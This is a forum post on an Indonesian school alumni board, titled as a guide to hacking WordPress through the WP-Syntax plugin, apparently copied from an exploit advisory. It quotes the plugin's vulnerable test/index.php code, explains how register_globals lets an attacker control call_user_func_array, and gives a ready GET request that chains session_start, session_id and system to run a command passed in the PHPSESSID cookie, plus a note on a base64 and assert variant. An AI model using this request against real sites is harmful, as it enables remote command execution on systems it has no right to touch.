=> Ini adalah forum untuk murid-murid maupun alumni SMP 1 WONOSARI ! Yang mau mengenang atau berbagi cerita bisa di forum ini ! Ramein Yuk ! <=

    Cara Hack Wordpress - Gunakan WP-Syntax



    Jumlah posting : 81
    Reputation : 0
    Join date : 07.04.10
    Age : 21
    Lokasi : Gunungkidul

    Cara Hack Wordpress - Gunakan WP-Syntax

    Post by Admin on Sun 11 Apr 2010 - 4:12

    titik kelamahan/bugs terdapat pada code test/index.php@132-150:

    function apply_filters($tag, $string)
    global $test_filter;

    if (!isset($test_filter[$tag])) return $string;

    uksort($test_filter[$tag], "strnatcasecmp");

    foreach ($test_filter[$tag] as $priority => $functions)
    if (is_null($functions)) continue;

    foreach($functions as $function)
    $string = call_user_func_array($function, array($string));
    return $string;

    Global variable test_filter is not defined, so register_globals = on
    makes it possible to pass arbitrary value into the first parameter of
    call_user_func_array(). Considering the fact that this function is
    called in a loop and the returned value is assinged to the second parameter
    on every iteration, it is obvious that user function can be called with
    a single parameter containing arbitrary data that can come from the
    environment, e.g. session id. There are several valid sequences of function
    calls that let execute any code.

    GET /wp-content/plugins/wp-syntax/test/index.php?test_filter[wp_head][99][0]=session_start&test_filter[wp_head][99][1]=session_id&test_filter[wp_head][99][2]=system HTTP/1.0
    Host: localhost
    Cookie: PHPSESSID=dir
    Connection: close

    Initially session_start() is called, then the return value of session_id() that
    contains command to execute passes to system().


    This vector was found by ShAnKaR and improves the previous one by using
    base64-encoded payload that broadens the char range that can be passed
    to the next function. Besides, assert() successfully executes arbitrary
    code being called in call_user_func_array() while the usage of eval() in
    this function is not possible.

      Waktu sekarang Tue 17 Jan 2017 - 10:11